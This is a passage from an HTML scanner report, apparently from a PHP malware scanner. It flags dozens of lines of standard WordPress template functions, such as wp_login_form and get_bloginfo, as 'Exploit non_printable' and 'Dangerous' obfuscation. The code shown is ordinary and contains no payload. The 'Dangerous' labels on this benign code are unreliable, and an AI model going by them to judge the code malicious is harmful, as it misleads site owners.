</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 499</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the form HTML code</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5003</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_admin_css_uri'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_file</span><span style="color: #007700">, </span><span style="color: #0000BB">$file </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5026</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_admin_css</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">= </span><span style="color: #DD0000">'wp-admin'</span><span style="color: #007700">, </span><span style="color: #0000BB">$force_echo </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5079</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_thickbox</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_generator</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the correct generator type </span><span style="color: #007700">for </span><span style="color: #0000BB">the requested output format</span><span style="color: #007700">. </span><span style="color: #0000BB">Allows</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_generator</span><span style="color: #007700">( </span><span style="color: #0000BB">$type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return - (</span><span style="color: #0000BB">html</span><span style="color: #007700">|</span><span style="color: #0000BB">xhtml</span><span style="color: #007700">|</span><span style="color: #0000BB">atom</span><span style="color: #007700">|</span><span style="color: #0000BB">rss2</span><span style="color: #007700">|</span><span style="color: #0000BB">rdf</span><span style="color: #007700">|</span><span style="color: #0000BB">comment</span><span style="color: #007700">|</span><span style="color: #0000BB">export</span><span style="color: #007700">).</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The HTML content </span><span style="color: #007700">for </span><span style="color: #0000BB">the generator</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_generator</span><span style="color: #007700">( </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5214</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"get_the_generator_</span><span style="color: #007700">{</span><span style="color: #0000BB">$type</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">$gen</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5227</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string HTML attribute </span><span style="color: #007700">or empty </span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 522</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">string Void </span><span style="color: #007700">if </span><span style="color: #DD0000">'echo' </span><span style="color: #0000BB">argument is true</span><span style="color: #007700">, </span><span style="color: #0000BB">login form HTML </span><span style="color: #007700">if </span><span style="color: #DD0000">'echo' </span><span style="color: #0000BB">is false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">checked</span><span style="color: #007700">( </span><span style="color: #0000BB">$checked</span><span style="color: #007700">, </span><span style="color: #0000BB">$current </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">__checked_selected_helper</span><span style="color: #007700">( </span><span style="color: #0000BB">$checked</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">, </span><span style="color: #0000BB">$display</span><span style="color: #007700">, </span><span style="color: #DD0000">'checked' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">selected</span><span style="color: #007700">( </span><span style="color: #0000BB">$selected</span><span style="color: #007700">, </span><span style="color: #0000BB">$current </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_login_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">__checked_selected_helper</span><span style="color: #007700">( </span><span style="color: #0000BB">$selected</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">, </span><span style="color: #0000BB">$display</span><span style="color: #007700">, </span><span style="color: #DD0000">'selected' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">disabled</span><span style="color: #007700">( </span><span style="color: #0000BB">$disabled</span><span style="color: #007700">, </span><span style="color: #0000BB">$current </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5268</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">__checked_selected_helper</span><span style="color: #007700">( </span><span style="color: #0000BB">$disabled</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">, </span><span style="color: #0000BB">$display</span><span style="color: #007700">, </span><span style="color: #DD0000">'disabled' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_readonly</span><span style="color: #007700">( </span><span style="color: #0000BB">$readonly_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$current </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">__checked_selected_helper</span><span style="color: #007700">( </span><span style="color: #0000BB">$readonly_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">, </span><span style="color: #0000BB">$display</span><span style="color: #007700">, </span><span style="color: #DD0000">'readonly' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5290</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">8.1</span><span style="color: #007700">. </span><span style="color: #0000BB">Since PHP 8.1</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">was extracted</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">checked</span><span style="color: #007700">, </span><span style="color: #0000BB">selected</span><span style="color: #007700">, </span><span style="color: #0000BB">disabled </span><span style="color: #007700">and </span><span style="color: #0000BB">readonly</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__checked_selected_helper</span><span style="color: #007700">( </span><span style="color: #0000BB">$helper</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">, </span><span style="color: #0000BB">$display</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">) { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.FunctionDoubleUnderscore</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Indicator glyph wrapped in a </span><span style="color: #007700">`</span><span style="color: #DD0000">span</span><span style="color: #007700">` </span><span style="color: #0000BB">tag</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5334</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_required_field_indicator</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5346</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_required_field_indicator'</span><span style="color: #007700">, </span><span style="color: #0000BB">$indicator </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5354</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Message text </span><span style="color: #007700">and </span><span style="color: #0000BB">glyph wrapped in a </span><span style="color: #007700">`</span><span style="color: #DD0000">span</span><span style="color: #007700">` </span><span style="color: #0000BB">tag</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5356</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_required_field_message</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5370</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_required_field_message'</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Heartbeat settings</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_heartbeat_settings</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 646</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$form</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 651</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the URL that allows the user to reset the lost password</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 656</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Lost password URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_lostpassword_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$redirect </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 684</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'lostpassword_url'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lostpassword_url</span><span style="color: #007700">, </span><span style="color: #0000BB">$redirect </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 698</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">string Void </span><span style="color: #007700">if `</span><span style="color: #0000BB">$display</span><span style="color: #007700">` </span><span style="color: #0000BB">argument is true</span><span style="color: #007700">, </span><span style="color: #0000BB">registration </span><span style="color: #007700">or </span><span style="color: #0000BB">admin link</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 701</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">'<li>'</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">'</li>'</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_footer</span><span style="color: #007700">( </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 729</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$link</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 734</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">the </span><span style="color: #DD0000">'wp_meta' </span><span style="color: #0000BB">action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 743</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_meta</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 761</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bloginfo</span><span style="color: #007700">( </span><span style="color: #0000BB">$show </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 810</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Mostly string values</span><span style="color: #007700">, </span><span style="color: #0000BB">might be </span><span style="color: #007700">empty.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bloginfo</span><span style="color: #007700">( </span><span style="color: #0000BB">$show </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$filter </span><span style="color: #007700">= </span><span style="color: #DD0000">'raw' </span><span style="color: #007700">) {</span>
</span>
